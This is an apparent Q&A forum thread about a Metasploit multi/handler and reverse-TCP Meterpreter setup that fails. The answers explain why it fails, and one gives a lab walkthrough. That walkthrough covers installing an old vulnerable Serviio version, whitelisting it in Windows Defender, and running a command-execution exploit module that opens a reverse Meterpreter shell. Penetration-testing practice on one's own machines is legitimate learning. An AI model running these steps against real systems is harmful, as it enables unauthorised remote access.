# Meterpreter commands not working in shell

Tags: metasploit, meterpreter

[image]

I used `use multi/handler` followed by `set PAYLOAD windows/meterpreter/reverse_tcp` then `set LPORT 80` and `set LHOST 192.168.0.11` after that I do `exploit -j -z` and go on my Windows machine connected to the same network and connect to `192.168.0.11:80` then I open my session with `sessions -i 1` then I'm in the meterpreter shell.

When I try to run `ls, ps, cd, download` etc... I get `Unknown Command: command`. What am I doing wrong? Some commands like `help` still work though.

Answer (score 2):

Simply, you cannot do that.

You sat up multi/handler with meterpreter reverse_tcp as payload and then you're gone to your victim machine and visited it like a website.

See, the multi/handler expect a connection from a meterpreter payload not from a web browser. That's why you couldn't execute anything.

To back up what I said, try it another time without the j and z options.
When you go to your windows machine and visit your attack box, you will see that the connection is dropped after the user-agent string is showing.

Answer (score 1):

How are you connecting from the target Windows machine back to your attacking machine?

It looks like since you're automatically backgrounding the session, you're not seeing where the session is never created. Try just "exploit" without the flags and you shouldn't get the meterpreter prompt like you are now. Does the session die after a minute or so?

In order to make this work, you'll need to find a vulnerability to exploit, which will deliver the payload and make it connect back to you. You should only have to use multi/handler for exploits launched outside of Metasploit, but it's not clear if you're doing that or not.

I searched around, found, and tested a vulnerable application that you can use to practice with in Windows 10. I don't know what the rules are for posting links for vulnerable software, so I'll just kind of direct you:
Serviio Media Server has a command execution vulnerability in some of its older versions. Info on the Metasploit module is located [here](https://www.rapid7.com/db/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec). I tested this with 1.7.1, so go to http://serviio.org/download and copy the link for the Windows version and change current version they're serving up (1.9.1) to 1.7.1 (literally just change the 9 to a 7).

Install Serviio Media Server on your Windows 10 box. I would recommend temporarily whitelisting the Drive:\Program Files\Serviio\bin directory in Windows Defender because it will catch Meterpreter.

From your attacking machine:

```
msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec (set the exploit)

msf exploit(windows...) > show options
```

You'll see that you need to set the RHOST (your Win10 machine) and SRVHOST (your attacking machine).

Next, set your payload (we'll go with reverse Meterpreter shell):

```
msf exploit(windows...) > set payload windows/meterpreter/reverse_tcp
```

set your `LHOST` to your attacking machine.

```
msf exploit(windows...) > exploit
```

Comment: ah I see. I am just typing the LHOST into my web browser on my windows 10 machine, how do I find a vulnerability? Thanks for the help.